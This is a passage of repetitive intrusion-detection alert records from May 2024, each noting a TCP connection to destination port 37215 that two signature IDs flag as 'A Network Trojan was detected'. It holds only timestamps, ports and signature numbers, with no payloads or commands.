            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945184
            SID:2835222
            Source Port:57282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.057729
            SID:2835222
            Source Port:44802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058745
            SID:2829579
            Source Port:56544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.262197
            SID:2835222
            Source Port:52830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.929908
            SID:2835222
            Source Port:51820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862944
            SID:2835222
            Source Port:36344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.084384
            SID:2829579
            Source Port:60732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026065
            SID:2835222
            Source Port:34650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.808719
            SID:2835222
            Source Port:50924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777467
            SID:2829579
            Source Port:51068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.905118
            SID:2829579
            Source Port:56948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930819
            SID:2829579
            Source Port:33148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.634624
            SID:2829579
            Source Port:43956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.033234
            SID:2835222
            Source Port:50550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.587997
            SID:2835222
            Source Port:33342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.859434
            SID:2829579
            Source Port:38996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309657
            SID:2829579
            Source Port:44942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.320964
            SID:2829579
            Source Port:46486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825265
            SID:2829579
            Source Port:54492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.084106
            SID:2835222
            Source Port:39110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.966794
            SID:2835222
            Source Port:41980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.559389
            SID:2829579
            Source Port:46002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541682
            SID:2829579
            Source Port:49440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777843
            SID:2835222
            Source Port:45274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.029842
            SID:2829579
            Source Port:41914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039714
            SID:2829579
            Source Port:51388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310689
            SID:2829579
            Source Port:32974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.326779
            SID:2835222
            Source Port:41814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.516623
            SID:2829579
            Source Port:53276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.543284
            SID:2835222
            Source Port:44250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956744
            SID:2829579
            Source Port:60300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.301057
            SID:2835222
            Source Port:43396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444880
            SID:2835222
            Source Port:56588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734204
            SID:2835222
            Source Port:49276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.064917
            SID:2835222
            Source Port:37574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.546210
            SID:2829579
            Source Port:36572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.772222
            SID:2829579
            Source Port:58966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.349091
            SID:2835222
            Source Port:57164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.451024
            SID:2835222
            Source Port:39360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.894616
            SID:2829579
            Source Port:50624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849207
            SID:2829579
            Source Port:45340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.342037
            SID:2835222
            Source Port:60098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.930093
            SID:2829579
            Source Port:46674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776504
            SID:2829579
            Source Port:34044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038306
            SID:2835222
            Source Port:47038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.765374
            SID:2835222
            Source Port:54872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770810
            SID:2835222
            Source Port:45086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.358913
            SID:2829579
            Source Port:40758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895390
            SID:2835222
            Source Port:40554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.768048
            SID:2829579
            Source Port:46868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.756559
            SID:2835222
            Source Port:56368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.372482
            SID:2829579
            Source Port:36898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.830511
            SID:2829579
            Source Port:60174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.946696
            SID:2835222
            Source Port:47218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.865572
            SID:2835222
            Source Port:48564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853835
            SID:2835222
            Source Port:58224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.635145
            SID:2829579
            Source Port:60628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.389643
            SID:2829579
            Source Port:52996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.825490
            SID:2835222
            Source Port:35620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.831738
            SID:2835222
            Source Port:48298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.058121
            SID:2835222
            Source Port:38310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.395873
            SID:2835222
            Source Port:59728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.296223
            SID:2835222
            Source Port:59814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.019767
            SID:2835222
            Source Port:41646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.772427
            SID:2829579
            Source Port:50418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.649764
            SID:2835222
            Source Port:49694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.057900
            SID:2829579
            Source Port:60002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.342318
            SID:2829579
            Source Port:49698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967593
            SID:2829579
            Source Port:60002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.307713
            SID:2829579
            Source Port:36800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031044
            SID:2829579
            Source Port:47324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862258
            SID:2829579
            Source Port:49280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952585
            SID:2829579
            Source Port:58834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953526
            SID:2835222
            Source Port:52336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989840
            SID:2829579
            Source Port:45056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.880521
            SID:2829579
            Source Port:54554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.716907
            SID:2835222
            Source Port:58432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995852
            SID:2829579
            Source Port:39592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.446899
            SID:2835222
            Source Port:33604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.941813
            SID:2829579
            Source Port:44056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.926430
            SID:2829579
            Source Port:45056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.993839
            SID:2829579
            Source Port:35120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.709946
            SID:2829579
            Source Port:50002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850215
            SID:2829579
            Source Port:35406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994093
            SID:2835222
            Source Port:38812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868409
            SID:2829579
            Source Port:42174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.552885
            SID:2835222
            Source Port:49564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.368337
            SID:2829579
            Source Port:57776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.738354
            SID:2835222
            Source Port:51154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767921
            SID:2829579
            Source Port:45618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.743088
            SID:2835222
            Source Port:53574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849022
            SID:2835222
            Source Port:44016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.815071
            SID:2829579
            Source Port:51164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.064980
            SID:2829579
            Source Port:34630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.645429
            SID:2835222
            Source Port:46160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759913
            SID:2835222
            Source Port:58758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857129
            SID:2829579
            Source Port:39294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.658041
            SID:2829579
            Source Port:59026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930048
            SID:2829579
            Source Port:60402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.078937
            SID:2835222
            Source Port:42710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.990527
            SID:2835222
            Source Port:37738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.299616
            SID:2829579
            Source Port:51792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.945014
            SID:2829579
            Source Port:54236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326129
            SID:2835222
            Source Port:59220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.053380
            SID:2829579
            Source Port:59558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.018739
            SID:2835222
            Source Port:59598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014533
            SID:2829579
            Source Port:39344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.855063
            SID:2829579
            Source Port:38754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.901640
            SID:2835222
            Source Port:43582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754739
            SID:2835222
            Source Port:39192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.597019
            SID:2829579
            Source Port:34400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.943561
            SID:2829579
            Source Port:48554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.027020
            SID:2835222
            Source Port:47548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.618114
            SID:2835222
            Source Port:45524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039786
            SID:2829579
            Source Port:32904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.966765
            SID:2829579
            Source Port:54416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.322593
            SID:2835222
            Source Port:37376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723469
            SID:2829579
            Source Port:44064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.063799
            SID:2829579
            Source Port:34580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.784675
            SID:2829579
            Source Port:59650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.584570
            SID:2835222
            Source Port:53354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.388297
            SID:2829579
            Source Port:41740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.334123
            SID:2829579
            Source Port:34152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.994439
            SID:2835222
            Source Port:34478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.936345
            SID:2829579
            Source Port:33038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.003934
            SID:2835222
            Source Port:33734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.414563
            SID:2829579
            Source Port:41286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.274840
            SID:2829579
            Source Port:36384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995240
            SID:2835222
            Source Port:55234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872598
            SID:2835222
            Source Port:48506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.316963
            SID:2829579
            Source Port:54076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.482878
            SID:2829579
            Source Port:42436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.883514
            SID:2835222
            Source Port:39130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.561902
            SID:2835222
            Source Port:37592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.377440
            SID:2835222
            Source Port:45134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.741642
            SID:2835222
            Source Port:48004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862016
            SID:2835222
            Source Port:37066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776655
            SID:2829579
            Source Port:50374
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412944
            SID:2835222
            Source Port:46410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336133
            SID:2835222
            Source Port:41552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039045
            SID:2829579
            Source Port:42024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.308783
            SID:2829579
            Source Port:46000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.334971
            SID:2835222
            Source Port:49096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.493652
            SID:2829579
            Source Port:53184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748568
            SID:2829579
            Source Port:44874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.308384
            SID:2835222
            Source Port:42260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.778196
            SID:2829579
            Source Port:57074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.435474
            SID:2835222
            Source Port:59708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.033484
            SID:2829579
            Source Port:54206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805610
            SID:2829579
            Source Port:39890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.757441
            SID:2835222
            Source Port:57614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.918944
            SID:2835222
            Source Port:50212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.300317
            SID:2835222
            Source Port:45428
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.138246
            SID:2835222
            Source Port:47364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.493988
            SID:2835222
            Source Port:35326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.987509
            SID:2835222
            Source Port:51136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809881
            SID:2835222
            Source Port:58122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.483002
            SID:2835222
            Source Port:56714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899680
            SID:2829579
            Source Port:46306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.587474
            SID:2835222
            Source Port:47418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.508327
            SID:2835222
            Source Port:32852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.052573
            SID:2835222
            Source Port:53388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.778395
            SID:2829579
            Source Port:56360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.549980
            SID:2835222
            Source Port:42476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.574527
            SID:2829579
            Source Port:58856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.463569
            SID:2829579
            Source Port:43792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.759988
            SID:2829579
            Source Port:50180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.896020
            SID:2829579
            Source Port:40864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.020677
            SID:2835222
            Source Port:48750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.298666
            SID:2829579
            Source Port:57098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.468670
            SID:2829579
            Source Port:50326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776729
            SID:2829579
            Source Port:42404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.649847
            SID:2829579
            Source Port:39486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.435170
            SID:2829579
            Source Port:58610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506834
            SID:2829579
            Source Port:56058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810812
            SID:2829579
            Source Port:38988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.934167
            SID:2829579
            Source Port:39278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.847324
            SID:2829579
            Source Port:58820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.655768
            SID:2835222
            Source Port:60546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777814
            SID:2835222
            Source Port:53836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.699711
            SID:2829579
            Source Port:49998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038139
            SID:2829579
            Source Port:51466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.993798
            SID:2829579
            Source Port:57482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069627
            SID:2835222
            Source Port:48382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.808369
            SID:2835222
            Source Port:47646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998602
            SID:2829579
            Source Port:58662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775682
            SID:2829579
            Source Port:46754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.880575
            SID:2835222
            Source Port:56514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507151
            SID:2835222
            Source Port:44422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605312
            SID:2835222
            Source Port:44284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.715750
            SID:2829579
            Source Port:54466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879850
            SID:2829579
            Source Port:58456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.511727
            SID:2835222
            Source Port:52548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984879
            SID:2835222
            Source Port:53546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.741907
            SID:2835222
            Source Port:47272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849141
            SID:2835222
            Source Port:55992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.313082
            SID:2829579
            Source Port:39208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
